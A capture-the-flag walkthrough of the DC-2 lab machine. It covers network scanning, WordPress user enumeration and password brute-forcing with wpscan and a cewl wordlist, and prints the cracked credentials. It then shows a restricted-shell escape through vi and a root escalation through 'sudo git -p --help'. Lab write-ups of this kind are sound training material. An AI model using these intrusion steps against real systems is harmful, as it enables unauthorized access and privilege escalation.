DC-2 ( Walkthrough )
Starting with enumeration in order to get the IP of the machine using “netdiscover” scan.
netdiscover -i vboxnet1
Here I got the IP of the machine that is 192.168.57.106 so now I proceed with the IP to scan the services running on the machine using “nmap” scan.
nmap -v -sT -p- 192.168.57.106
Here I got two ports open that are 80 and 7744. So, I started a deep scan to get the details of the services running on the port with their versions.
nmap -v -A -sT -p- 192.168.57.106PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:05:C7:56 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.001 days (since Fri Feb 21 10:46:09 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Here on port no. 80 Apache server is up and on port no. 7744 the “ssh” service is running. Here I take a look on web what is running their or if I got any information their.
Browsing the url “ http://192.168.57.106”
Here I got flag link which the first flag, moving to that,
After reading the flag I moved to the terminal to get the words that are present on the website and make a file named pass.txt using “cewl”
cewl http://dc-2 > pass.txt
Now using “wpscan” tool to enumerate the names of WordPress users.
wpscan --url dc-2 -e u
Here I got the user names now with these user I again user “wpscan” tool to get the password to log in to WordPress.
wpscan -U admin,jerry,tom --url dc-2 -P pass.txt
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
Using the above mentioned credentials I tried to log in to ssh service, but here I am not able to get logged in with the user “jerry” then I tried with “tom” nad here I get logged in.
ssh email@example.com -p 7744
After logging in I got two files.
Here I check the commands that we can run with the user “Tom”.
tom@DC-2:~$ ls -la usr/bin
Here user Tom have the permission to use “vi” command to get the bash shell commands using “vi”.
> :set shell=/bin/bash
After setting the shell as /bin/bash I exported the shell
tom@DC-2:~$ export PATH=/bin:/usr/bin/
Here we get the bash shell, that's cool now I can read the flag3.txt file.
tom@DC-2:~$ cat flag3.txt
Here I switched to user “jerry” as to get another flag.
tom@DC-2:~$ su jerry
Username: jerry, Password: adipiscing
I used to check the root user command if I can run with a normal user.
jerry@DC-2:/home/tom$ sudo -l
Got that, the user can run the “git” command as root user.
Before proceeding I check if any flag is available their or not. And I got the flag4.txt named file.
As the flag says I have to use “git” command here to proceed forward after minimizing the terminal.
jerry@DC-2:~$ sudo git -p --help
Well here I got the shell.
root@DC-2:/home/jerry# cd | ls
root@DC-2:~# cat final-flag.txt
Here we go, good to see the final flag of the machine. Enjoyed the CTF and came to know about interesting tools.